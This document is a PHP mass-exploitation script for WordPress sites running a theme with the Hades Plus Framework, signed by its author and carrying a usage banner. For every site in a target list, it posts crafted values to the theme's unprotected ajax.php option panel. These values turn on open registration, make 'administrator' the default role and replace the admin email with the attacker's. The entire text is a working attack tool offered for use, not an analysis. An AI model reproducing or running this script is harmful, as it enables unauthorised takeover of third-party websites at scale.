wordpress 0day add admin

1. <?php
2.  
3. /*
4. coded by Mr.MaGnoM
5. all rights reserved . dont chabge it
6. made in morocco
7. 23/09/2013
8.  
9. visit my blog : http://magsec.blogspot.com/
10. */
11.  
12. print"
13. +---------------------------------------------------+
14. | mass exploiting for exploit |
15. | WordPress 0day - Hades Plus Framework Add Admin |
16. | exploit :http://1337day.com/exploit/22660 |
17. | Coded by Mr.MaGnoM -- twitter : @MrMaGnoM |
18. | visit my blog : http://magsec.blogspot.com/ |
19. | usage php $argv[0] list.txt theme |
20. | exampl : php mass.php list.txt archin |
21. +---------------------------------------------------+\n
22. ";
23.  
24. if(!$argv[1] and !$argv[2] ){
25. die("usage php $argv[0] list.txt theme\n");
26. }
27.  
28. $get=@file_get_contents($argv[1]);
29. $expl=explode("\n", $get);
30.  
31. foreach ($expl as $key) {
32. $link="$key/wp-content/themes/$argv[2]/hades_framework/option_panel/ajax.php";
33. echo "\n\tsite : $key ";
34. adduser($link);
35. }
36.  
37. function adduser($site){
38. $ch = curl_init(
39. "$site");
40. curl_setopt($ch, CURLOPT_POST, true);
41. curl_setopt($ch, CURLOPT_POSTFIELDS,
42. array(
43. "values[0][name]" => "users_can_register",
44. "values[0][value]" => "1",
45. "values[1][name]" => "admin_email",
46. "values[1][value]" => "here ur email",
47. "values[2][name]" => "default_role",
48. "values[2][value]" => "administrator",
49. "action" => "save",
50. "submit" => "submit"
51. ));
52. curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
53. $result = curl_exec($ch);
54. curl_close($ch);
55. if($result=="success"){
56. echo "\n\texploit : $result \n";
57. }else{
58. echo "\n\texploit : no \n";
59. }
60. }
61. ?>